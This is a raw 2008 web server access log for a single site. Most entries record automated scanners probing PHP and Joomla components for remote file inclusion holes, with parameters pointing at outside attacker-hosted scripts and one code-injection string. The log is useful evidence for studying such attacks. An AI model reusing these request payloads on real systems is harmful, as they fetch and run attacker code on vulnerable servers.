64.185.237.143 - - [25/Mar/2008:08:38:57 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Mar/2008:08:38:57 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:08:39:04 -0700] "GET /logs/access_080207.log//header.php?tpl_pgb_moddir=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:08:39:04 -0700] "GET //header.php?tpl_pgb_moddir=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:08:39:04 -0700] "GET /logs//header.php?tpl_pgb_moddir=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.118.252.252 - - [25/Mar/2008:08:39:05 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://konfraternia.tarnow.pl/cutenews/data/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.53.125 - - [25/Mar/2008:08:39:06 -0700] "GET /logs/errors.php?error=http://www.benew.nl/vragenlijst/classes/adodb/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
209.216.209.45 - - [25/Mar/2008:08:39:28 -0700] "GET /logs/access_080120.log/protection.php?action=logout&siteurl=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.209.45 - - [25/Mar/2008:08:39:28 -0700] "GET /protection.php?action=logout&siteurl=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.209.45 - - [25/Mar/2008:08:39:28 -0700] "GET /logs/protection.php?action=logout&siteurl=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.64 - - [25/Mar/2008:08:39:38 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [25/Mar/2008:08:39:38 -0700] "GET /logs/access_080312.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.64 - - [25/Mar/2008:08:39:38 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.64 - - [25/Mar/2008:08:39:39 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.64 - - [25/Mar/2008:08:39:40 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.64 - - [25/Mar/2008:08:39:40 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.64 - - [25/Mar/2008:08:39:40 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.176 - - [25/Mar/2008:08:39:41 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [25/Mar/2008:08:39:41 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [25/Mar/2008:08:39:41 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [25/Mar/2008:08:39:41 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [25/Mar/2008:08:39:41 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [25/Mar/2008:08:39:43 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:08:39:44 -0700] "GET /logs/access_080127.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:08:39:44 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:08:39:59 -0700] "GET /logs/access_080225.log//header.php?tpl_pgb_moddir=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:08:40:01 -0700] "GET /logs/access.log//index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:08:40:01 -0700] "GET //index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:08:40:02 -0700] "GET /logs//index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [25/Mar/2008:08:40:15 -0700] "GET /logs/access_080120.log/akocomments.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [25/Mar/2008:08:40:15 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [25/Mar/2008:08:40:18 -0700] "GET /logs/access_080215.log/akocomments.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.141.48.206 - - [25/Mar/2008:08:40:25 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
62.141.48.206 - - [25/Mar/2008:08:40:26 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
66.71.191.190 - - [25/Mar/2008:08:40:34 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [25/Mar/2008:08:40:43 -0700] "GET /logs/access_071230.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:08:40:51 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:08:41:09 -0700] "GET /logs/access_080120.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.61.37.111 - - [25/Mar/2008:08:41:24 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.61.37.111 - - [25/Mar/2008:08:41:24 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:08:41:43 -0700] "GET /logs/access_080207.log//modules/Neos_Chronos/header.php?base_folder=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:08:41:43 -0700] "GET //modules/Neos_Chronos/header.php?base_folder=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:08:41:43 -0700] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:08:41:43 -0700] "GET /logs/access_080131.log//modules/Neos_Chronos/header.php?base_folder=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.18.55 - - [25/Mar/2008:08:42:00 -0700] "GET /funny/?D=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:08:42:23 -0700] "GET /logs/access_080215.log//login.php?dir=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:08:42:23 -0700] "GET /logs//login.php?dir=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.61.37.111 - - [25/Mar/2008:08:42:29 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.61.37.111 - - [25/Mar/2008:08:42:29 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
189.26.87.181 - - [25/Mar/2008:08:42:36 -0700] "GET /logs/smarty_config.php?root_dir=http://d34drbt.110mb.com/files/cmds/id.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.26.87.181 - - [25/Mar/2008:08:42:37 -0700] "GET /smarty_config.php?root_dir=http://d34drbt.110mb.com/files/cmds/id.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.37.111 - - [25/Mar/2008:08:42:43 -0700] "GET /logs/access_080306.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.221.91.28 - - [25/Mar/2008:08:42:48 -0700] "GET //login.php?dir=http://netbr.org/documents/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
213.113.108.77 - - [25/Mar/2008:08:42:53 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.200.254.233 - - [25/Mar/2008:08:42:54 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.71.191.190 - - [25/Mar/2008:08:43:30 -0700] "GET /logs/access_080131.log//index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.71.191.190 - - [25/Mar/2008:08:43:30 -0700] "GET //index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.71.191.190 - - [25/Mar/2008:08:43:30 -0700] "GET /logs//index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.219.217.74 - - [25/Mar/2008:08:43:32 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://emredijital.com.tr/administrator/components/com_remository/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.219.217.74 - - [25/Mar/2008:08:43:32 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://emredijital.com.tr/administrator/components/com_remository/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.71.214.76 - - [25/Mar/2008:08:44:14 -0700] "GET /logs/access_080118.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.71.214.76 - - [25/Mar/2008:08:44:15 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.71.214.76 - - [25/Mar/2008:08:44:15 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.71.214.76 - - [25/Mar/2008:08:44:17 -0700] "GET /logs/access_080118.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.71.214.76 - - [25/Mar/2008:08:44:17 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.71.214.76 - - [25/Mar/2008:08:44:17 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:08:44:27 -0700] "GET /logs/access_080126.log//login.php?dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:08:44:28 -0700] "GET //login.php?dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:08:44:29 -0700] "GET /logs//login.php?dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:08:44:52 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:08:45:34 -0700] "GET /logs/access_080312.log/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.221.91.28 - - [25/Mar/2008:08:45:37 -0700] "GET /logs/access_080118.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [25/Mar/2008:08:45:38 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:08:45:53 -0700] "GET /logs/access_080201.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:08:45:53 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:08:45:53 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:08:45:58 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:08:45:58 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
92.228.233.160 - - [25/Mar/2008:08:46:01 -0700] "GET /logs/access_071018.loghttp://amyswedding.eclub.lv/images? HTTP/1.0" 404 275 "-" "Googlebot/2.1 (http://www.googlebot.com/bot.html)" "www.dmulk.com"
67.205.15.135 - - [25/Mar/2008:08:46:06 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.15.135 - - [25/Mar/2008:08:46:06 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.15.135 - - [25/Mar/2008:08:46:06 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.71.191.190 - - [25/Mar/2008:08:46:16 -0700] "GET /logs/access_080127.log//modules/Neos_Chronos/header.php?base_folder=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.221.91.28 - - [25/Mar/2008:08:46:16 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.185.237.143 - - [25/Mar/2008:08:46:30 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Mar/2008:08:46:30 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Mar/2008:08:46:30 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.129.115 - - [25/Mar/2008:08:46:35 -0700] "GET /logs/access_080118.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.129.115 - - [25/Mar/2008:08:46:35 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.129.115 - - [25/Mar/2008:08:46:35 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Mar/2008:08:46:39 -0700] "GET /logs/access_080312.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.71.214.76 - - [25/Mar/2008:08:46:46 -0700] "GET /logs/access_080127.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.71.214.76 - - [25/Mar/2008:08:46:48 -0700] "GET /logs/access_080127.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.185.237.143 - - [25/Mar/2008:08:46:48 -0700] "GET /logs/access_080306.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Mar/2008:08:46:49 -0700] "GET /logs/access_080306.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.88.85.83 - - [25/Mar/2008:08:47:11 -0700] "GET /logs/access_080118.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.88.85.83 - - [25/Mar/2008:08:47:11 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.88.85.83 - - [25/Mar/2008:08:47:12 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.135.200.3 - - [25/Mar/2008:08:47:17 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.88.85.83 - - [25/Mar/2008:08:47:22 -0700] "GET /logs/access_080118.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.88.85.83 - - [25/Mar/2008:08:47:23 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.88.85.83 - - [25/Mar/2008:08:47:23 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.135.200.3 - - [25/Mar/2008:08:47:29 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.135.200.3 - - [25/Mar/2008:08:47:34 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:08:47:35 -0700] "GET //?pag=http://netbr.org/documents/cmd.txt? HTTP/1.1" 200 3094 "-" "libwww-perl/5.808" "www.dmulk.com"
89.248.100.19 - - [25/Mar/2008:08:47:42 -0700] "GET //administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
89.248.100.19 - - [25/Mar/2008:08:47:42 -0700] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
74.6.25.171 - - [25/Mar/2008:08:47:51 -0700] "GET /funny/?D=D HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:08:48:07 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:08:48:07 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
